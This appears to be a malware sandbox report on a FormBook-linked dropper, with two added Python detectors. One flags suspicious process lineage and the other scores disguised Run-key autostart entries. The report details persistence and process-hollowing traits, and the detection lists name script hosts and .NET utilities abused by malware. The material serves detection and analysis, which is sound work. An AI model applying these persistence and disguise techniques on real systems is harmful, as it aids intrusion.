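from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return ntpath.basename(self.image).lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# .NET framework utilities commonly used as hollowing targets (RegSvcs.exe here).
NET_LOLBINS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\desktop\\", "\\downloads\\", "\\users\\public\\")


def in_user_writable(path: str) -> bool:
    return any(seg in path.lower() for seg in USER_WRITABLE)


class ProcessTree:
    def __init__(self, events: List[Proc]):
        self.by_pid: Dict[int, Proc] = {p.pid: p for p in events}
        self.children: Dict[int, List[Proc]] = defaultdict(list)
        for p in events:
            self.children[p.ppid].append(p)

    def parent(self, p: Proc) -> Optional[Proc]:
        return self.by_pid.get(p.ppid)

    def ancestors(self, p: Proc) -> List[Proc]:
        out, cur = [], self.parent(p)
        while cur is not None:
            out.append(cur)
            cur = self.parent(cur)
        return out

    def render(self, root_ppid: int = 0) -> str:
        """Indented text tree; roots are processes whose parent is unknown."""
        lines: List[str] = []

        def walk(ppid: int, depth: int) -> None:
            for p in self.children.get(ppid, []):
                lines.append("    " * depth + f"{p.name} (pid {p.pid})")
                walk(p.pid, depth + 1)

        walk(root_ppid, 0)
        return "\n".join(lines)


def detect(tree: ProcessTree) -> List[str]:
    hits: List[str] = []
    for p in tree.by_pid.values():
        parent = tree.parent(p)
        # Sigma "WScript or CScript Dropper" / "Script Interpreter Execution From
        # Suspicious Folder": script host fed from, or started by, user-writable paths.
        if p.name in SCRIPT_HOSTS and (
            in_user_writable(p.cmdline) or (parent is not None and in_user_writable(parent.image))
        ):
            hits.append(f"script-host-dropper:{p.pid}")
        # A file without an executable extension (tguujh.msc) run from Temp under a script host.
        if (in_user_writable(p.image) and not p.name.endswith(".exe")
                and any(a.name in SCRIPT_HOSTS for a in tree.ancestors(p))):
            hits.append(f"non-exe-image-from-temp:{p.pid}")
        # RegSvcs.exe started by an executable in Temp: hollowing target (FormBook payload).
        if p.name in NET_LOLBINS and parent is not None and in_user_writable(parent.image):
            hits.append(f"lolbin-injection-target:{p.pid}")
    return hits


TEMP = r"C:\Users\user\AppData\Local\Temp"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"   # assumed path
SAMPLE_EVENTS = [  # constructed; ppid 0 marks a root of the graph
    Proc(1000, 0, r"C:\Users\user\Desktop\uhbrQkYNzx.exe", "uhbrQkYNzx.exe"),
    Proc(1010, 1000, r"C:\Windows\SysWOW64\wscript.exe", f'wscript.exe "{TEMP}\\RarSFX0\\stage.vbs"'),
    Proc(1020, 1010, r"C:\Windows\SysWOW64\cmd.exe", f'cmd.exe /c "{TEMP}\\RarSFX0\\tguujh.msc"'),
    Proc(1021, 1010, r"C:\Windows\SysW OW64\cmd.exe".replace(" ", ""), "cmd.exe /c ipconfig"),
    Proc(1030, 1021, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig"),
    Proc(1040, 1020, rf"{TEMP}\RarSFX0\tguujh.msc", "tguujh.msc"),
    Proc(1050, 1040, REGSVCS, "RegSvcs.exe"),
    Proc(1051, 1040, REGSVCS, "RegSvcs.exe"),
    Proc(2000, 0, rf"{TEMP}\dsvk\tguujh.msc.exe", rf"{TEMP}\dsvk\TGUUJH~1.EXE {TEMP}\dsvk\nhhjmppg.dll"),
    Proc(2010, 2000, REGSVCS, "RegSvcs.exe"),
]

if __name__ == "__main__":
    tree = ProcessTree(SAMPLE_EVENTS)
    print(tree.render())
    for h in detect(tree):
        print("HIT", h)
```

The second root (pid 2000) models the autostart re-launch the graph shows for tguujh.msc.exe; its RegSvcs.exe child is caught by the parent-path rule even though it has no script-host ancestor, which is the case a rule keyed only on wscript.exe lineage would miss.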

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample
                    Source | Detection | Scanner | Label
                    uhbrQkYNzx.exe | 68% | ReversingLabs | Win32.Trojan.Runner

                    Dropped Files
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc | 0% | ReversingLabs | (none)
                    C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe | 0% | ReversingLabs | (none)
                    C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc | 0% | ReversingLabs | (none)
                    C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe | 0% | ReversingLabs | (none)
                    C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe.exe | 0% | ReversingLabs | (none)

                    Unpacked PE Files: No Antivirus matches
                    Domains: No Antivirus matches
                    URLs: No Antivirus matches

                    Contacted Domains: No contacted domains info

                    URLs from Memory and Binaries
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://www.autoitscript.com/autoit3/J | uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp, tguujh.msc.exe, 00000010.00000002.1734578720.0000000000C95000.00000002.00000001.01000000.0000000D.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | false | (none) | high
                    https://www.autoitscript.com/autoit3/ | uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.dr | false | (none) | high

                    Contacted IPs: No contacted IP infos
                    Joe Sandbox version: 41.0.0 Charoite
                    Analysis ID: 1569428
                    Start date and time: 2024-12-05 19:00:52 +01:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 9m 44s
                    Hypervisor based Inspection enabled: false
                    Report type: full
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes: 26
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: uhbrQkYNzx.exe (renamed because the original name is a hash value)
                    Original Sample Name: f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3.exe
                    Detection: MAL
                    Classification: mal100.troj.evad.winEXE@28/48@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 180
                    • Number of non-executed functions: 227
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed; the report is missing behavior information.
                    • Report creation exceeded the maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: uhbrQkYNzx.exe
                    Simulations: Behavior and APIs
                    Time | Type | Description
                    14:20:49 | API Interceptor | 1x Sleep call for process: uhbrQkYNzx.exe modified
                    14:21:41 | API Interceptor | 3x Sleep call for process: RegSvcs.exe modified
                    20:20:55 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                    20:21:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                    20:21:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
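The three autostart entries above carry every trait the report's signature "Creates autostart registry keys with suspicious values" and the Sigma rule "New RUN Key Pointing to Suspicious Folder" look for: a value named WindowsUpdate that points outside \Windows\, a binary under the user's Temp directory written with an 8.3 short name, and a DLL path handed to it as the only argument. The following is an added example, not Joe Sandbox code, that parses lines in this table's layout (including the fused form the extraction produced) and scores them; the input lines are constructed, and the scoring rules are this example's own.

```python
"""Triage of Run-key autostart entries of the kind listed in the Simulations
table above. Added example; not Joe Sandbox code. The input lines are
constructed in the layout of the report's "Autostart Run:" rows (including
the fused form the extraction produced); the scoring rules are this
example's own and follow the report's signature "Creates autostart registry
keys with suspicious values" and the Sigma rule "New RUN Key Pointing to
Suspicious Folder".
"""
import re
import shlex
from dataclasses import dataclass, field
from typing import List

RUN_LINE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d)\s*Autostart\s*Run:\s*"
    r"(?P<key>HK\w+\\\S+)\s+(?P<name>\S+)\s+(?P<cmd>.+)$"
)
# A legitimate autostart has no business living under these directories.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Temp|Downloads|Public)\\", re.I)
# Value names that imitate Windows components; the real ones live under \Windows\.
IMPERSONATED = {"windowsupdate", "windows update", "microsoft", "defender"}
SHORT_NAME = re.compile(r"~\d")


@dataclass
class Finding:
    time: str
    key: str
    name: str
    exe: str
    args: List[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def parse_run_line(line: str) -> Finding:
    m = RUN_LINE.match(line.strip())
    if m is None:
        raise ValueError(f"not an Autostart Run line: {line!r}")
    # posix=False keeps backslashes literal; quotes still group "C:\Program Files\...".
    parts = shlex.split(m["cmd"], posix=False)
    exe = parts[0].strip('"')
    args = [p.strip('"') for p in parts[1:]]
    return Finding(m["time"], m["key"], m["name"], exe, args)


def assess(f: Finding) -> Finding:
    if USER_WRITABLE.search(f.exe):
        f.reasons.append("binary lives under a user-writable temp directory")
    if SHORT_NAME.search(f.exe):
        f.reasons.append("8.3 short name hides the real file name")
    if f.name.lower() in IMPERSONATED and "\\windows\\" not in f.exe.lower():
        f.reasons.append(f"value name {f.name!r} imitates a Windows component")
    if any(a.lower().endswith(".dll") for a in f.args):
        f.reasons.append("DLL path passed as argument (host/side-loading pattern)")
    if f.key.upper().startswith("HKLM"):
        f.reasons.append("machine-wide Run key: written with admin rights, fires for every user")
    return f


def triage_autostart(lines: List[str]) -> List[Finding]:
    return [assess(parse_run_line(l)) for l in lines if "Autostart" in l]


# Constructed lines; the first three mirror the report's entries, the last is a benign control.
SAMPLE_LINES = [
    "14:20:49 API Interceptor 1x Sleep call for process: uhbrQkYNzx.exe modified",
    r"20:20:55 Autostart Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate "
    r"C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll",
    r"20:21:08 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate "
    r"C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll",
    r"20:21:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate "
    r"C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll",
    r'09:00:00 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive '
    r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
]

if __name__ == "__main__":
    for f in triage_autostart(SAMPLE_LINES):
        print(f"{f.time} {f.key}\\{f.name} -> {f.exe} score={f.score}")
        for r in f.reasons:
            print("   -", r)
```

The HKLM entry scores one point higher than the HKCU ones only because of the key scope; the HKLM write is also the one that tells you the sample ran with administrative rights in the sandbox, which is worth recording separately from the persistence itself.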
                    Joe Sandbox View / Context
                    IPs: No context
                    Domains: No context
                    ASNs: No context
                    JA3 Fingerprints: No context

                    Dropped Files
                    Match: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe
                    Associated Sample Name / URL | Detection | Threat Name
                    qPLzfnxGbj.exe | malicious | FormBook
                    ngPebbPhbp.exe | malicious | RHADAMANTHYS
                    FS04dlvJrq.exe | malicious | FormBook
                    M1Y6kc9FpE.exe | malicious | FormBook
                    mJIvCBk5vF.exe | malicious | FormBook
                    lcbF0sywlU.exe | malicious | FormBook
                    1aG5DoOsAW.exe | malicious | FormBook
                    Factura-2410-CFDI.bat | malicious | Unknown
                    DGFmCcZnM0.exe | malicious | FormBook
                    qZkywW6Q0b.exe | malicious | FormBook
                    Match: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                    Associated Sample Name / URL | Detection | Threat Name
                    qPLzfnxGbj.exe | malicious | FormBook
                    ngPebbPhbp.exe | malicious | RHADAMANTHYS
                    FS04dlvJrq.exe | malicious | FormBook
                    M1Y6kc9FpE.exe | malicious | FormBook
                    mJIvCBk5vF.exe | malicious | FormBook
                    lcbF0sywlU.exe | malicious | FormBook
                    1aG5DoOsAW.exe | malicious | FormBook
                    Factura-2410-CFDI.bat | malicious | Unknown
                    DGFmCcZnM0.exe | malicious | FormBook
                    qZkywW6Q0b.exe | malicious | FormBook
                                                             Process: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                             File Type: ASCII text, with CRLF line terminators
                                                             Category: dropped
                                                             Size (bytes): 558
                                                             Entropy (8bit): 5.4249857641377375
                                                             Encrypted: false
                                                             SSDEEP: 12:zQkwgVKGFrBPVRHcgfNBuJMaBPw+2xP7J:skwRGFrV8gVDaq+2xjJ
                                                             MD5: 5E972946E66C873892B9DBC7627F43DA
                                                             SHA1: 531AA209BEC0E92CAA45C1716009F92FDEC216E8
                                                             SHA-256: 4E6AB4AF4097CDCBA0A9668830ADAB6D2F0E887F3E4A6D6C5D1E4208B8F1CD24
                                                             SHA-512: BA9B207D3CA6EEA7CF5DD80D1789FB50B26525AD7825768BD0C8E02A1F1FE9E0FBFB76BBAEE3F03C90C4CC96D66321AFE80DC0C24CA3ABC21D5A26C42BE1C9B9
                                                             Malicious: false
                                                            Preview:T49UAt23lz8879J2c1j9lx..UpDownConstants ComboConstants..5991J97j84I6HHd89JQ8AM9596MK9Ksf6Lo6d3s2068f9..ToolTipConstants ComboConstants..48EK7K17goP5ho12J52kdM13977Zq5N57SVMZ094PZTy33w704kvon81jqflw8g54uK5j2tKRHwGbg1QV57..StructureConstants TreeViewConstants..5at4alj54x5p..ComboConstants StructureConstants..51hM4FU2EU04230Q7lUc92pQw09QY80f4P9mN8929I2YSV8613a5ugetqgE356T57j1601e0232cfi5..DateTimeConstants FileConstants..200l42S40..ToolbarConstants TreeViewConstants..EVYU7941n878P31s7U1148D7E0923tv57Lzn1qCJtu77Fk3h97jW2Dqyo..ColorConstants FontConstants..
                                                             Process: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                             File Type: ASCII text, with CRLF line terminators
                                                             Category: dropped
                                                             Size (bytes): 567
                                                             Entropy (8bit): 5.56094256591372
                                                             Encrypted: false
                                                             SSDEEP: 12:kXLFRBnBAu8DuiBNJHF1VlgtfTeQGsRrKKHglCvwbiPyi:UBnBcDdBNJHFqUKRGaKTbi3
                                                             MD5: 08CFF3453C8ECDCAFACB5F99FF833910
                                                             SHA1: BDE46DD6D3F60241171346300AEAD24D1FBB60A8
                                                             SHA-256: 8D52C2CDA979BA14CD244D5FAB615F283821B6F86C34B998D82166F0FD41521D
                                                             SHA-512: 6076BE5D7B848D13CAE7B39D82D59AA137971F2438B82B85B67C119C57BA100C469B5A54B7BE4C19803BCEDC236C6D79A163A2E78BEFF78AB3C0911D8886A4E5
                                                             Malicious: false
                                                            Preview:dj40yWTkLz8gD0aE32t54cm7nbXv08WG689I6654LM24834zH42fAJzryjZr468ejo08823P9c0v8L4373072M4Pi4rM8P44L0q4h56L494M78tIn6K396ss7d1wfd719FEaQ53t2i1G6l823M9X46k058L53P5..StructureConstants UpDownConstants..N0jR3vG6Qy03m57549wztX29v8cF08H9590N42Nn4xRXxqNQh6S9169gr1364n6Bk036958IJz4lt05qW3dij1Q7KCM6JU2yK33f3Yi707H458uJc45TMFFYI66R3T20gAnT..FontConstants ComboConstants..4NJM2Qy7s5lt3Wo6025V39q7qaX51h63i0g3O3wy154c764Y9i81Vw36D69536V9EQ5gb0E1J0UHot36Dqxz0w200N8hWe03818rV5607v846w2bO9uZ02VeS24QdsEXn875t7MHO0315282XE147CvKR37090215390qcM0E2Blz..ComboConstants ComboConstants..
                                                             Process: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                             File Type: ASCII text, with CRLF line terminators
                                                             Category: dropped
                                                             Size (bytes): 36673
                                                             Entropy (8bit): 5.594573464180928
                                                             Encrypted: false
                                                             SSDEEP: 768:4x6JUE3SMIoX7l10mWIkTeb7TBZb7bFZ9lcjWTMKvzkwVLMXmBGRV0h4S:4xOSzoX7BxkTI7TBxxlCWT2ALM2opS
                                                             MD5: DC4380A1A59A937CE03D955B430E9948
                                                             SHA1: AF1B043D785071D380B4129D6C18836AF858F216
                                                             SHA-256: 89B5DC18DE51C0DE35B888B9FE2E8D6995917F7AFF56C6ACF1BB3185CB63BE9E
                                                             SHA-512: 39A40D4A51F0C930DE35B664BEF1FC438D76F2EA1CBBF19E5A1FC718EE0B80CE9098377B9FEF8FF8ABC254B54C0711F79142B230DC18E9116BDFD995623B4AD5
                                                             Malicious: false
                                                            Preview:88M1ak5g6X4Wpk..3Inr3h1UuKjOPn0Z7wf6COg240sG536nS56Y0960L574r3x90u8328wRXC28688..4591Bui610yG7qa6y8W61V14qMc89C78h5580PyBf92e3..9z103T41U84872S62M768h3m645V8iLZ0Q77rx45rPsrPq6LnHnCI6k0kCJ..7c6o0f3n3423OuGRc1QPG58378qNHeDpq11IdT0b0VXY713I2C2IELtA3339xfw96I9J97ebP82q3..096oXVPYC188WS68XnM3T8X8P06w2I908Jrwx7Ro6xG7in370kI85YVq00H7177s11u4op3MN..TQqw26ae7n2f98i7709337h3RO8WTJ636sgu5QN03OBTiW5RA5l40Os56N0b..wT6628IJ1O00J1E36ttL8R9ek6k8Z07340nJCY02v07a9vc45i2oi..F4dn1cMAxi54xyl5e346A4284N2L56Ewb418026Oc0C579X85ORnO193tZ9pGo..6ew46AzpJ788VE7t6u1ab5u7XsGAUBFMjt846nZ37RQdE0AzwS9n66ZjB80062B0K9P66mJJS5Z66JBgRLcdMBQ10..F5o725KqV26Cq23988Glv1I668mpS73252N7Dd4D3012094aT0g5828a39IGQ9W9ET3YpQ5oJ986750g0..W993DG3349S4ln00m3yv3h575824p5Vs8517uitTf1hR8gDkoPHT3..55h03o8TM1b0965T6g2XB5ZGxM6U..0YC4mBU7JQ383mt3bHG9qih18U11133Oa439338y4U820mljq8Pd4u21..74204rz7pu2583mr173vHki684qqDl906Rvy976TRls2cQ7s3B8rP..3q3ON2GZ60BCZxL9K48886h9455Js09vT9CjN095AF..YB3j046mN988T77L8T4X8Y7w47u0B75knO0U0B38x3l3GkLQkbou9qK8j3Bc
                                                             Process: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                             File Type: Unicode text, UTF-16, little-endian text, with very long lines (406), with CRLF line terminators
                                                             Category: dropped
                                                             Size (bytes): 84984
                                                             Entropy (8bit): 2.9903521299108915
                                                             Encrypted: false
                                                            SSDEEP:24:QRP5P5P5P5P5P5P5P5P5P5P5P5P5P5P5PA0YeeeeeeeeeeeeeeeeeeeeeaYSSSSa:IHiW6WDhWC6lnIhnrQ
                                                             MD5: AE7483D6C77F985615D1A9773CF32FA4
                                                             SHA1: DF4224A3D4254710A23540C67508EE2E855311AD
                                                             SHA-256: BF37F552799B94662EC2D476D1DE56CD5DF26A74AF0303B47631C4E9EF28DC63
                                                             SHA-512: 37F33701B9775824E9387DA02460E743BD166C681C16F50250253D3DFB9039D16125BCFCD14C795575512192DDF639080568577111DFDB1B46AE21CD9BEE1EEA
                                                             Malicious: false
                                                            Preview:..T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.T.e.l.e.V.r.a.m.(.4.1.).:.....T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.T.e.l.e.V.r.a.m.(.4.).:.....T.e.l.e.V.r.a.m.(.4.4.).:.T.e.l.e.V.r.a.m.(.4.
                                                             Process: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                             File Type: ASCII text, with CRLF line terminators
                                                             Category: dropped
                                                             Size (bytes): 645
                                                             Entropy (8bit): 5.557586766694295
                                                             Encrypted: false
                                                             SSDEEP: 12:jpm92LT7ZCy1K8BPU8RLZjdahra+gLMgo6iwlhh2pW60D3gLCOGLv6bICL:QuZy8/LZjdasno6ip70DMTGr6bHL
                                                             MD5: 10E739785CD454F2A477C9FEC9FE4A93
                                                             SHA1: 88436B1606ECD432A9CBBB226A497F3F69E200B6
                                                             SHA-256: ABCEFD6184280165128C23B72ED46AA34C2E77E956AFA7EF2B2CE748FBAFA565
                                                             SHA-512: 7B60546D5AA028AB8EDD2D6EBDEF6F3EC25D0ECBBD623ADC2CFC791CED54E27E081DF3E738135D278240B71FDE45353E3FCB8618823E16B0C67AF55BB35146D1
                                                             Malicious: false
                                                            Preview:4ma268jx5pe0Np1O4j8F5b8F610ECe9jg04p0I6Ms63J7qlj6Q3Re8Sw..DateTimeConstants FontConstants..9GIYgs8ms8HckR04eyO1e332wdd5..FontConstants TreeViewConstants..N4677x6it9bgevv36s742bCI94PIIn7PcXX168F6FT575616Z11zH95Rn38XI16x7060LWPzm8qxxt774X6K24I58S9hng3O7A8..DateTimeConstants ComboConstants..6dI07O30n27Z44L5Bni6Sc8t25H8c1s1PRI92j0DjBWM7U4309A33NA8xh8g1iDo21064G6qo40340DcYC494Lp5T73d12Fo077LD6F1yC8S5y1k5BW90..DateTimeConstants GuiDateTimePicker..HyJIwy..BorderConstants UpDownConstants..v7H0o3D71AX707671666D7667u32el54e3A66g0lHchd0q7iCRzr80S4916E2Jv685863U2wx1ZqG816w70ySEG9s7UY62K757vo84283uWTkX4Gc26yP8SH7..StructureConstants ButtonConstants..
                                                             Process: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                             File Type: ASCII text, with CRLF line terminators
                                                             Category: dropped
                                                             Size (bytes): 569
                                                             Entropy (8bit): 5.546164799845927
                                                             Encrypted: false
                                                             SSDEEP: 6:yPLxTS4m/mxNlRwBkQRfLobhJhEWpjRIlM/IGWKd0QRI5LWiE6r4jVdKe5LWYzwU:6xTFqBhJEbhDKkb+ER6UWeTwLTDDbE1
                                                             MD5: 5C2105F29D585C991E34474F76511B8B
                                                             SHA1: B8F45DDB8B66554FFF166823B3839A6754A203F1
                                                             SHA-256: E24AC134DC8B26B8036B0CD4671E4FC722E3391D5D72B897070398ED0D377353
                                                             SHA-512: 854187C18AC225D61EAB217763B822D839A0082CCE5482385D9D1EED9E18F44C93CA098ACCF1C8BE8457F24DBD34F1E2FE4A354B6C8BE88559037C406DCAAD7A
                                                             Malicious: false
                                                            Preview:SM5D2N7T369p69jne3p6tH6JMCG8F1..ButtonConstants ButtonConstants..2R9W446J4613LLY6tli151Vm18qVM5BZ40Hv28M4l48C19t7b4TZlH0675jY89Q40x42Q7H8Fvgt7E9F802fOWhOi32h0R8354w13Q5r750HJY31K97HT43R984DaKRM4o2uR2Z1cVg5842HECr98G9FjmF14o0323M2l4cy4..ButtonConstants DateTimeConstants..X073683u29EW9n5J6AMJaB1DJ67x3Lv122164F3vQ8nG1n166q589T08CD6jK87l59OM55CFhnNJOx1..ToolbarConstants DateTimeConstants..WHkj91w1U6V747Ra4815Jv1o0K190L107wOau5f58q24Sa6250Yl2yn6TWs9p7V6HRK9k28K1699C7901392Q7brLd966ubRYC5w7XXtC4274O6h5ucp312c558m90r3lE3TCa541lJX5nXbbQ..GuiDateTimePicker FileConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):574
                                                            Entropy (8bit):5.506003077562106
                                                            Encrypted:false
                                                            SSDEEP:12:8XeVpRuKqetRNY9UW4DcMld6L/JQdcj0hwExqh7qkk9jhh:8apRunsNY9zwbld6LXujkWD9h
                                                            MD5:350AD61843075D982363E7DA5685789E
                                                            SHA1:1E3649C8683F73AE16F704C29E46D71FA2D3725C
                                                            SHA-256:B6C17B3F5AA47450425E920AB286E5CF5E3988271F977AE1BA969A872B9BB665
                                                            SHA-512:BEDB2CB274C7400EF8B6A39C9C5D5DB159C1CF02640F145DAA69600121A9D5A617D5BEDA4D9A6F245A33AA4C4AD3EC06C06778CAF864C06DF656BBEB81138C2E
                                                            Malicious:false
                                                            Preview:614U7iN7ZKHLl00060c35S704NfelQ056Yl50oB4QL406BuwKks1E991x0a98p8zhgLS2PwTw7Urz1qX75ENyeo5r31..StructureConstants ColorConstants..325b7L4hq467y90eM9E3T9iSh45Y689b083w85l1MV3a2k6TC4L7002qUv63Q34L904U45D99n0udbX3p7k088F..ButtonConstants ButtonConstants..109X69g8795it4ZCoBJTI63ioBh7999n25K9F9Rq9e6k77847XxBkV7qPHge2V2T78UzX..DateTimeConstants FileConstants..dK3206T1..FileConstants ToolTipConstants..c5Uaas4A3l5P50bVi39xR974uf9di1..ButtonConstants ComboConstants..Mz2E111x02Lb92LXs3D6Sos3zR2745W00F06zLv8759xr9ZL4j1IEL44I9834igo7G164Kyfk2RMRA..StructureConstants FileConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):115071724
                                                            Entropy (8bit):7.040365181374398
                                                            Encrypted:false
                                                            SSDEEP:98304:FNTNKNeNUNAN+NTNmNFNbNmN2NYNmNpNXNbNCNINVN8NeNNNBNPNLNCNjNINJNDt:B
                                                            MD5:E15FB1F8600E5EEDE00A8CA7FF8012D1
                                                            SHA1:53EA558E9EA5F975CE0D0E379BA4D2A8D9CB4968
                                                            SHA-256:4BE158BB86B94202C4DF7FB5F57EE8D3D229CB2D64E7CF764A0F2A488D517082
                                                            SHA-512:34788AA4D0BCE701C3A0DCF75C90E3DC221A7ABDF3720AF828874233A24DEB5697434E331AA43D21788EE96A9B802F1E76610FFBA2F72EF523B053C46E62FF95
                                                            Malicious:false
